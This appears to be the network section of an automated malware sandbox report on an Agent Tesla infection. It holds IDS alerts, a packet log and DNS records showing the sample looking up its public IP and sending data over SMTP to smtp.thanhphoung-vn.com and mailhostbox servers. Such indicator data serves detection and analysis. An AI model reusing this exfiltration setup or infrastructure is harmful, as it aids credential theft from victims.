                                                                                                    192.168.2.3208.91.199.225497035872851779 03/20/23-11:35:13.114104TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49703587192.168.2.3208.91.199.225
                                                                                                    192.168.2.3208.91.198.143497045872030171 03/20/23-11:35:14.897278TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49704587192.168.2.3208.91.198.143
                                                                                                    192.168.2.3208.91.199.223496985872030171 03/20/23-11:34:24.041330TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49698587192.168.2.3208.91.199.223
                                                                                                    192.168.2.3208.91.198.143497025872840032 03/20/23-11:35:12.738289TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249702587192.168.2.3208.91.198.143
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Mar 20, 2023 11:34:04.680804968 CET49697443192.168.2.3173.231.16.76
                                                                                                    Mar 20, 2023 11:34:04.680874109 CET44349697173.231.16.76192.168.2.3
                                                                                                    Mar 20, 2023 11:34:04.680977106 CET49697443192.168.2.3173.231.16.76
                                                                                                    Mar 20, 2023 11:34:04.764014959 CET49697443192.168.2.3173.231.16.76
                                                                                                    Mar 20, 2023 11:34:04.764056921 CET44349697173.231.16.76192.168.2.3
                                                                                                    Mar 20, 2023 11:34:05.419517994 CET44349697173.231.16.76192.168.2.3
                                                                                                    Mar 20, 2023 11:34:05.419630051 CET49697443192.168.2.3173.231.16.76
                                                                                                    Mar 20, 2023 11:34:05.424472094 CET49697443192.168.2.3173.231.16.76
                                                                                                    Mar 20, 2023 11:34:05.424499035 CET44349697173.231.16.76192.168.2.3
                                                                                                    Mar 20, 2023 11:34:05.425107956 CET44349697173.231.16.76192.168.2.3
                                                                                                    Mar 20, 2023 11:34:05.564618111 CET49697443192.168.2.3173.231.16.76
                                                                                                    Mar 20, 2023 11:34:05.707492113 CET49697443192.168.2.3173.231.16.76
                                                                                                    Mar 20, 2023 11:34:05.707551956 CET44349697173.231.16.76192.168.2.3
                                                                                                    Mar 20, 2023 11:34:05.970412970 CET44349697173.231.16.76192.168.2.3
                                                                                                    Mar 20, 2023 11:34:06.064398050 CET44349697173.231.16.76192.168.2.3
                                                                                                    Mar 20, 2023 11:34:06.064754963 CET49697443192.168.2.3173.231.16.76
                                                                                                    Mar 20, 2023 11:34:06.066046953 CET49697443192.168.2.3173.231.16.76
                                                                                                    Mar 20, 2023 11:34:21.968075991 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:22.153086901 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:22.153326988 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:22.878103971 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:22.878870964 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:23.063564062 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:23.063883066 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:23.065187931 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:23.258714914 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:23.260112047 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:23.451380968 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:23.451690912 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:23.637947083 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:23.638286114 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:23.848236084 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:23.851207018 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:24.037393093 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:24.041330099 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:24.041449070 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:24.041563034 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:24.041614056 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:24.225850105 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:24.225893021 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:24.360294104 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:24.566260099 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:26.123390913 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:26.309504032 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:26.309533119 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:26.309673071 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:26.309797049 CET49698587192.168.2.3208.91.199.223
                                                                                                    Mar 20, 2023 11:34:26.494208097 CET58749698208.91.199.223192.168.2.3
                                                                                                    Mar 20, 2023 11:34:26.842420101 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:27.027049065 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:27.027729988 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:27.325263977 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:27.325484037 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:27.510116100 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:27.510591030 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:27.510909081 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:27.698324919 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:27.698901892 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:27.889137983 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:27.889378071 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:28.078640938 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:28.078994036 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:28.289134026 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:28.289359093 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:28.475245953 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:28.478169918 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:28.478286982 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:28.478393078 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:28.480474949 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:28.481839895 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:28.484353065 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:28.488352060 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:28.488766909 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:28.662743092 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:28.665241957 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:28.666315079 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:28.672934055 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:28.712579966 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:28.828916073 CET58749699208.91.199.225192.168.2.3
                                                                                                    Mar 20, 2023 11:34:28.879077911 CET49699587192.168.2.3208.91.199.225
                                                                                                    Mar 20, 2023 11:34:30.297919035 CET49700443192.168.2.3104.237.62.211
                                                                                                    Mar 20, 2023 11:34:30.297946930 CET44349700104.237.62.211192.168.2.3
                                                                                                    Mar 20, 2023 11:34:30.298019886 CET49700443192.168.2.3104.237.62.211
                                                                                                    Mar 20, 2023 11:34:30.320446014 CET49700443192.168.2.3104.237.62.211
                                                                                                    Mar 20, 2023 11:34:30.320467949 CET44349700104.237.62.211192.168.2.3
                                                                                                    Mar 20, 2023 11:34:31.008763075 CET44349700104.237.62.211192.168.2.3
                                                                                                    Mar 20, 2023 11:34:31.008974075 CET49700443192.168.2.3104.237.62.211
                                                                                                    Mar 20, 2023 11:34:31.086452007 CET49700443192.168.2.3104.237.62.211
                                                                                                    Mar 20, 2023 11:34:31.086497068 CET44349700104.237.62.211192.168.2.3
                                                                                                    Mar 20, 2023 11:34:31.086904049 CET44349700104.237.62.211192.168.2.3
                                                                                                    Mar 20, 2023 11:34:31.145052910 CET49700443192.168.2.3104.237.62.211
                                                                                                    Mar 20, 2023 11:34:31.581836939 CET49700443192.168.2.3104.237.62.211
                                                                                                    Mar 20, 2023 11:34:31.581891060 CET44349700104.237.62.211192.168.2.3
                                                                                                    Mar 20, 2023 11:34:31.749855995 CET44349700104.237.62.211192.168.2.3
                                                                                                    Mar 20, 2023 11:34:31.749946117 CET44349700104.237.62.211192.168.2.3
                                                                                                    Mar 20, 2023 11:34:31.750000954 CET49700443192.168.2.3104.237.62.211
                                                                                                    Mar 20, 2023 11:34:31.751223087 CET49700443192.168.2.3104.237.62.211
                                                                                                    Mar 20, 2023 11:34:49.059318066 CET49701443192.168.2.3173.231.16.76
                                                                                                    Mar 20, 2023 11:34:49.059384108 CET44349701173.231.16.76192.168.2.3
                                                                                                    Mar 20, 2023 11:34:49.059488058 CET49701443192.168.2.3173.231.16.76
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Mar 20, 2023 11:34:04.587151051 CET6270453192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:34:04.604804993 CET53627048.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:34:04.630570889 CET4997753192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:34:04.648533106 CET53499778.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:34:21.423542976 CET5784053192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:34:21.610035896 CET53578408.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:34:21.668317080 CET5799053192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:34:21.963712931 CET53579908.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:34:26.378746986 CET5238753192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:34:26.563721895 CET53523878.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:34:26.650958061 CET5692453192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:34:26.834669113 CET53569248.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:34:30.184617996 CET6062553192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:34:30.205163956 CET53606258.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:34:30.247442961 CET4930253192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:34:30.265024900 CET53493028.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:34:48.972012997 CET5397553192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:34:48.991746902 CET53539758.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:34:49.006277084 CET5113953192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:34:49.025790930 CET53511398.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:35:07.848213911 CET5295553192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:35:07.866302967 CET53529558.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:35:07.923472881 CET6058253192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:35:08.107903004 CET53605828.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:35:11.521610022 CET5713453192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:35:11.543288946 CET53571348.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:35:11.550168991 CET6205053192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:35:11.568840981 CET53620508.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:35:13.346518040 CET5604253192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:35:13.366147041 CET53560428.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:35:13.370173931 CET5963653192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:35:13.389741898 CET53596368.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:35:13.686616898 CET5563853192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:35:13.704447031 CET53556388.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:35:13.707135916 CET5770453192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:35:13.891561985 CET53577048.8.8.8192.168.2.3
                                                                                                    Mar 20, 2023 11:35:18.445074081 CET6532053192.168.2.38.8.8.8
                                                                                                    Mar 20, 2023 11:35:18.463351011 CET53653208.8.8.8192.168.2.3
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Mar 20, 2023 11:34:04.587151051 CET192.168.2.38.8.8.80x7ae6Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:04.630570889 CET192.168.2.38.8.8.80x695Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:21.423542976 CET192.168.2.38.8.8.80xe8f9Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:21.668317080 CET192.168.2.38.8.8.80x9677Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:26.378746986 CET192.168.2.38.8.8.80x17f9Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:26.650958061 CET192.168.2.38.8.8.80x706fStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:30.184617996 CET192.168.2.38.8.8.80x77bdStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:30.247442961 CET192.168.2.38.8.8.80x687fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:48.972012997 CET192.168.2.38.8.8.80x1893Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:49.006277084 CET192.168.2.38.8.8.80x92beStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:07.848213911 CET192.168.2.38.8.8.80xef2dStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:07.923472881 CET192.168.2.38.8.8.80xe3adStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:11.521610022 CET192.168.2.38.8.8.80xef58Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:11.550168991 CET192.168.2.38.8.8.80xa756Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.346518040 CET192.168.2.38.8.8.80xcf7dStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.370173931 CET192.168.2.38.8.8.80x950cStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.686616898 CET192.168.2.38.8.8.80x2a52Standard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.707135916 CET192.168.2.38.8.8.80xa55dStandard query (0)smtp.thanhphoung-vn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:18.445074081 CET192.168.2.38.8.8.80x10dcStandard query (0)203.215.12.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Mar 20, 2023 11:34:04.604804993 CET8.8.8.8192.168.2.30x7ae6No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:04.604804993 CET8.8.8.8192.168.2.30x7ae6No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:04.604804993 CET8.8.8.8192.168.2.30x7ae6No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:04.604804993 CET8.8.8.8192.168.2.30x7ae6No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:04.648533106 CET8.8.8.8192.168.2.30x695No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:04.648533106 CET8.8.8.8192.168.2.30x695No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:04.648533106 CET8.8.8.8192.168.2.30x695No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:04.648533106 CET8.8.8.8192.168.2.30x695No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:21.610035896 CET8.8.8.8192.168.2.30xe8f9No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:21.610035896 CET8.8.8.8192.168.2.30xe8f9No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:21.610035896 CET8.8.8.8192.168.2.30xe8f9No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:21.610035896 CET8.8.8.8192.168.2.30xe8f9No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:21.610035896 CET8.8.8.8192.168.2.30xe8f9No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:21.963712931 CET8.8.8.8192.168.2.30x9677No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:21.963712931 CET8.8.8.8192.168.2.30x9677No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:21.963712931 CET8.8.8.8192.168.2.30x9677No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:21.963712931 CET8.8.8.8192.168.2.30x9677No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:21.963712931 CET8.8.8.8192.168.2.30x9677No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:26.563721895 CET8.8.8.8192.168.2.30x17f9No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:26.563721895 CET8.8.8.8192.168.2.30x17f9No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:26.563721895 CET8.8.8.8192.168.2.30x17f9No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:26.563721895 CET8.8.8.8192.168.2.30x17f9No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:26.563721895 CET8.8.8.8192.168.2.30x17f9No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:26.834669113 CET8.8.8.8192.168.2.30x706fNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:26.834669113 CET8.8.8.8192.168.2.30x706fNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:26.834669113 CET8.8.8.8192.168.2.30x706fNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:26.834669113 CET8.8.8.8192.168.2.30x706fNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:26.834669113 CET8.8.8.8192.168.2.30x706fNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:30.205163956 CET8.8.8.8192.168.2.30x77bdNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:30.205163956 CET8.8.8.8192.168.2.30x77bdNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:30.205163956 CET8.8.8.8192.168.2.30x77bdNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:30.205163956 CET8.8.8.8192.168.2.30x77bdNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:30.265024900 CET8.8.8.8192.168.2.30x687fNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:30.265024900 CET8.8.8.8192.168.2.30x687fNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:30.265024900 CET8.8.8.8192.168.2.30x687fNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:30.265024900 CET8.8.8.8192.168.2.30x687fNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:48.991746902 CET8.8.8.8192.168.2.30x1893No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:48.991746902 CET8.8.8.8192.168.2.30x1893No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:48.991746902 CET8.8.8.8192.168.2.30x1893No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:48.991746902 CET8.8.8.8192.168.2.30x1893No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:49.025790930 CET8.8.8.8192.168.2.30x92beNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:49.025790930 CET8.8.8.8192.168.2.30x92beNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:49.025790930 CET8.8.8.8192.168.2.30x92beNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:34:49.025790930 CET8.8.8.8192.168.2.30x92beNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:07.866302967 CET8.8.8.8192.168.2.30xef2dNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:07.866302967 CET8.8.8.8192.168.2.30xef2dNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:07.866302967 CET8.8.8.8192.168.2.30xef2dNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:07.866302967 CET8.8.8.8192.168.2.30xef2dNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:07.866302967 CET8.8.8.8192.168.2.30xef2dNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:08.107903004 CET8.8.8.8192.168.2.30xe3adNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:08.107903004 CET8.8.8.8192.168.2.30xe3adNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:08.107903004 CET8.8.8.8192.168.2.30xe3adNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:08.107903004 CET8.8.8.8192.168.2.30xe3adNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:08.107903004 CET8.8.8.8192.168.2.30xe3adNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:11.543288946 CET8.8.8.8192.168.2.30xef58No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:11.543288946 CET8.8.8.8192.168.2.30xef58No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:11.543288946 CET8.8.8.8192.168.2.30xef58No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:11.543288946 CET8.8.8.8192.168.2.30xef58No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:11.543288946 CET8.8.8.8192.168.2.30xef58No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:11.568840981 CET8.8.8.8192.168.2.30xa756No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:11.568840981 CET8.8.8.8192.168.2.30xa756No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:11.568840981 CET8.8.8.8192.168.2.30xa756No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:11.568840981 CET8.8.8.8192.168.2.30xa756No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:11.568840981 CET8.8.8.8192.168.2.30xa756No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.366147041 CET8.8.8.8192.168.2.30xcf7dNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.366147041 CET8.8.8.8192.168.2.30xcf7dNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.366147041 CET8.8.8.8192.168.2.30xcf7dNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.366147041 CET8.8.8.8192.168.2.30xcf7dNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.366147041 CET8.8.8.8192.168.2.30xcf7dNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.389741898 CET8.8.8.8192.168.2.30x950cNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.389741898 CET8.8.8.8192.168.2.30x950cNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
